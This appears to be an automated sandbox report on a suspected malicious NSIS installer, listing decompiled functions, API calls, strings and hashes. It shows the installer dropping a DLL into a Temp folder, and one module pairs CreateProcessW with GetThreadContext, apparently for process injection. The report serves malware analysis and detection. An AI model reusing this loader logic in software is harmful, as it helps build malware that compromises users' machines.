                0x00402df7
                0x00000000
                0x00000000
                0x00402dfc
                0x00402dff
                0x00000000
                0x00000000
                0x00000000
                0x00402ce3
                0x00402ce8
                0x00402ce8
                0x00402ced
                0x00402cf1
                0x00402cf8
                0x00402cfd
                0x00402cff
                0x00402d01
                0x00402d01
                0x00402d05
                0x00402d0a
                0x00402d0c
                0x00402e36
                0x00402e2d
                0x00000000
                0x00402e2d
                0x00402d12
                0x00402d19
                0x00402d95
                0x00402d99
                0x00402d9d
                0x00402da2
                0x00000000
                0x00402d99
                0x00402d22
                0x00402d27
                0x00402d2a
                0x00402d2f
                0x00000000
                0x00000000
                0x00402d31
                0x00402d38
                0x00000000
                0x00000000
                0x00402d3a
                0x00402d41
                0x00000000
                0x00000000
                0x00402d43
                0x00402d4a
                0x00000000
                0x00000000
                0x00402d4c
                0x00402d53
                0x00000000
                0x00000000
                0x00402d55
                0x00402d5b
                0x00402d64
                0x00402d6a
                0x00402d6d
                0x00402d6f
                0x00402d75
                0x00000000
                0x00000000
                0x00402d7b
                0x00402d7f
                0x00402d87
                0x00402d87
                0x00402d8a
                0x00402d8d
                0x00402d8f
                0x00402d91
                0x00402d91
                0x00000000
                0x00402d8f
                0x00402d81
                0x00402d85
                0x00000000
                0x00000000
                0x00000000
                0x00402da3
                0x00402da3
                0x00402da9
                0x00402db5
                0x00402db5
                0x00402db8
                0x00402dbe
                0x00402dc0
                0x00402dc0
                0x00402dc8
                0x00402dc8
                0x00000000
                0x00402dc8

                APIs
                • GetTickCount.KERNEL32 ref: 00402C66
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\RHK098760045678009000.exe,00000400), ref: 00402C82
                  • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\RHK098760045678009000.exe,80000000,00000003), ref: 00405873
                  • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RHK098760045678009000.exe,C:\Users\user\Desktop\RHK098760045678009000.exe,80000000,00000003), ref: 00402CCE
                Strings
                • C:\Users\user\Desktop\RHK098760045678009000.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                • "C:\Users\user\Desktop\RHK098760045678009000.exe" , xrefs: 00402C55
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402C5F
                • Inst, xrefs: 00402D3A
                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                • soft, xrefs: 00402D43
                • Null, xrefs: 00402D4C
                • pA, xrefs: 00402CE3
                • C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
                • Error launching installer, xrefs: 00402CA5
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$AttributesCountCreateModuleNameSizeTick
                • String ID: "C:\Users\user\Desktop\RHK098760045678009000.exe" $C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RHK098760045678009000.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                • API String ID: 4283519449-2179403289
                • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004056F8(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040568B(E00405B98(0x409c10, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c10);
					E00405B98();
				}
				E00405DFA(0x409c10);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E93(0x409c10);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405850(0x409c10);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040586F(0x409c10, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E84(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fc8;
						goto L32;
					} else {
						E00405B98(0x40a410, 0x425000);
						E00405B98(0x425000, 0x409c10);
						E00405BBA(_t75, 0x40a410, 0x409c10, "C:\Users\FRONTD~1\AppData\Local\Temp\nsr3472.tmp\fbnwl.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405B98(0x425000, 0x40a410);
						_t62 = E00405459("C:\Users\FRONTD~1\AppData\Local\Temp\nsr3472.tmp\fbnwl.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fc8 =  &( *0x423fc8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c10);
								_push(0xfffffffa);
								E00404E84();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E84(0xffffffea,  *(_t85 - 0xc));
				 *0x423ff4 =  *0x423ff4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 8));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E8E(); // executed
				 *0x423ff4 =  *0x423ff4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffee);
					} else {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffe9);
						lstrcatA(0x409c10,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c10);
					E00405459();
					goto L29;
				}
				goto L33;
			}
















                0x00401751
                0x00401758
                0x00401761
                0x00401764
                0x00401767
                0x0040176c
                0x00401774
                0x00401790
                0x00401776
                0x00401776
                0x00401777
                0x00401777
                0x00401796
                0x004017a0
                0x004017a0
                0x004017a4
                0x004017a7
                0x004017ac
                0x004017ae
                0x004017b0
                0x004017b5
                0x004017b5
                0x004017c0
                0x004017c0
                0x004017d1
                0x004017d3
                0x004017d3
                0x004017d4
                0x004017d4
                0x004017d7
                0x004017da
                0x004017dd
                0x004017dd
                0x004017e4
                0x004017f3
                0x004017f8
                0x004017fb
                0x004017fe
                0x00000000
                0x00000000
                0x00401800
                0x00401803
                0x0040185d
                0x00401862
                0x004015a8
                0x0040268f
                0x0040268f
                0x004028be
                0x004028c1
                0x004028c1
                0x00000000
                0x00401805
                0x0040180b
                0x00401816
                0x00401823
                0x0040182e
                0x00401844
                0x00401844
                0x00401847
                0x00000000
                0x0040184d
                0x0040184d
                0x0040184e
                0x0040186b
                0x004028c7
                0x004028c7
                0x004028c7
                0x00401850
                0x00401850
                0x00401851
                0x00401492
                0x00402241
                0x00402241
                0x00402241
                0x0040184e
                0x00401847
                0x004028c9
                0x004028cd
                0x004028cd
                0x0040187b
                0x00401880
                0x00401886
                0x00401887
                0x00401888
                0x0040188b
                0x0040188e
                0x00401893
                0x00401899
                0x0040189d
                0x0040189f
                0x004018a7
                0x004018b3
                0x004018a1
                0x004018a1
                0x004018a5
                0x00000000
                0x00000000
                0x004018a5
                0x004018bc
                0x004018c2
                0x004018c4
                0x00000000
                0x004018ca
                0x004018ca
                0x004018cd
                0x004018e5
                0x004018cf
                0x004018d2
                0x004018db
                0x004018db
                0x004018ea
                0x004018ef
                0x0040223c
                0x00000000
                0x0040223c
                0x00000000

                APIs
                • lstrcatA.KERNEL32(00000000,00000000,ymvwfuvwx,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                • CompareFileTime.KERNEL32(-00000014,?,ymvwfuvwx,ymvwfuvwx,00000000,00000000,ymvwfuvwx,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                  • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,aufce Setup,NSIS Error), ref: 00405BA5
                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                  • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                  • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                • String ID: C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\nsr3472.tmp$C:\Users\user~1\AppData\Local\Temp\nsr3472.tmp\fbnwl.dll$ymvwfuvwx
                • API String ID: 1941528284-1522727099
                • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402E8E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				intOrPtr _t91;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f0e0;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					_t91 =  *0x423f98; // 0x2cb32
					E004030B3(_t91 + _t60);
				}
				_t62 = E00403081( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E00403081(0x40b0e0, _t98) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x40b0e0, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E00403081(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00406005(0x40b050);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403081(0x40b0e0, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40b068 = 0x40b0e0;
						 *0x40b06c = _t99;
						while(1) {
							 *0x40b070 = _t88;
							 *0x40b074 = _v12; // executed
							_t74 = E00406025(0x40b050); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40b070; // 0x40f0e0
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423ff4 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404E84(0,  &_v88);
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40b070; // 0x40f0e0
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}
























                0x00402e96
                0x00402e9a
                0x00402e9d
                0x00402ea2
                0x00402ea4
                0x00402ea4
                0x00402eab
                0x00402eaf
                0x00402eb3
                0x00402eb5
                0x00402eb5
                0x00402eba
                0x00402ebf
                0x00402ec1
                0x00402eca
                0x00402eca
                0x00402ed5
                0x00402edc
                0x0040302c
                0x0040302c
                0x00000000
                0x00402ee2
                0x00402ee6
                0x00403017
                0x0040306c
                0x00403031
                0x00403037
                0x00403039
                0x00403039
                0x0040304a
                0x00000000
                0x0040304c
                0x0040305f
                0x00403011
                0x00403011
                0x0040302e
                0x0040302e
                0x00000000
                0x00403066
                0x00403066
                0x00403069
                0x00000000
                0x00403069
                0x0040305f
                0x0040304a
                0x00403077
                0x00000000
                0x00403077
                0x0040301c
                0x0040301e
                0x0040301e
                0x0040302a
                0x00403074
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040302a
                0x00402ef7
                0x00402efa
                0x00402eff
                0x00402eff
                0x00402f09
                0x00402f0c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00402f12
                0x00402f12
                0x00402f12
                0x00402f1a
                0x00402f1c
                0x00402f1c
                0x00402f2d
                0x00000000
                0x00000000
                0x00402f33
                0x00402f36
                0x00402f3c
                0x00402f42
                0x00402f4a
                0x00402f50
                0x00402f55
                0x00402f5c
                0x00402f5f
                0x00000000
                0x00000000
                0x00402f65
                0x00402f6b
                0x00402f6d
                0x00402f7a
                0x00402f7c
                0x00402faa
                0x00402fb0
                0x00402fb9
                0x00402fbe
                0x00402fbe
                0x00402fc5
                0x00403005
                0x00000000
                0x00000000
                0x00000000
                0x00402fc7
                0x00402fca
                0x00402fea
                0x00402fed
                0x00402ff0
                0x00402ff6
                0x00402ffa
                0x00000000
                0x00000000
                0x00000000
                0x00403000
                0x00402fd6
                0x00402fde
                0x00000000
                0x00402fe5
                0x00402fe5
                0x00000000
                0x00402fe5
                0x00402fde
                0x00402fc5
                0x0040300d
                0x00000000
                0x0040300d
                0x00000000
                0x00402f12

                APIs
                • GetTickCount.KERNEL32 ref: 00402EEC
                • GetTickCount.KERNEL32 ref: 00402F6D
                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F9A
                • wsprintfA.USER32 ref: 00402FAA
                • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CountTick$FileWritewsprintf
                • String ID: ... %d%%
                • API String ID: 4209647438-2449383134
                • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405346, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405346(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                0x00405351
                0x00405355
                0x00405358
                0x0040535e
                0x00405362
                0x00405366
                0x0040536e
                0x00405375
                0x0040537b
                0x00405382
                0x00405389
                0x00405391
                0x00405393
                0x00000000
                0x00405393
                0x0040539d
                0x004053a4
                0x004053ba
                0x00000000
                0x00000000
                0x00000000
                0x004053bc
                0x004053c0

                APIs
                • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                • GetLastError.KERNEL32 ref: 0040539D
                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                • GetLastError.KERNEL32 ref: 004053BC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorLast$CreateDirectoryFileSecurity
                • String ID: C:\Users\user\Desktop$Ls@$\s@
                • API String ID: 3449924974-621692704
                • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF86355, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                Download Yara Rule
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 6FF86499
                • GetThreadContext.KERNELBASE(?,00010007), ref: 6FF864BC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ContextCreateProcessThread
                • String ID: D
                • API String ID: 2843130473-2746444292
                • Opcode ID: 967b0ed0b159f7095b4aee75cd24dcf2308fc0388ad5ca128b708bfd307461cf
                • Instruction ID: a6af290f3ef0cbee9f56d0f7705cb67fbf97aec50f8ccd2cf053d0318e821e26
                • Opcode Fuzzy Hash: 967b0ed0b159f7095b4aee75cd24dcf2308fc0388ad5ca128b708bfd307461cf
                • Instruction Fuzzy Hash: D2A1E571E54209EFDB40DFA8C980BAEBBB5BF09314F104465E526EB290E771AE81CF14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405EBA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405EBA(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                0x00405ed1
                0x00405eda
                0x00405edc
                0x00405edc
                0x00405ee0
                0x00405ef2
                0x00405eec
                0x00405eec
                0x00405eec
                0x00405ef6
                0x00405f0a
                0x00405f1e
                0x00405f25

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                • wsprintfA.USER32 ref: 00405F0A
                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: DirectoryLibraryLoadSystemwsprintf
                • String ID: %s%s.dll$UXTHEME$\
                • API String ID: 2200240437-4240819195
                • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040589E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040589E(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                0x004058a2
                0x004058a8
                0x004058a9
                0x004058a9
                0x004058aa
                0x004058b1
                0x004058bb
                0x004058c8
                0x004058cb
                0x004058d3
                0x00000000
                0x00000000
                0x004058d7
                0x00000000
                0x00000000
                0x004058d9
                0x00000000
                0x004058d9
                0x00000000

                APIs
                • GetTickCount.KERNEL32 ref: 004058B1
                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058CB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
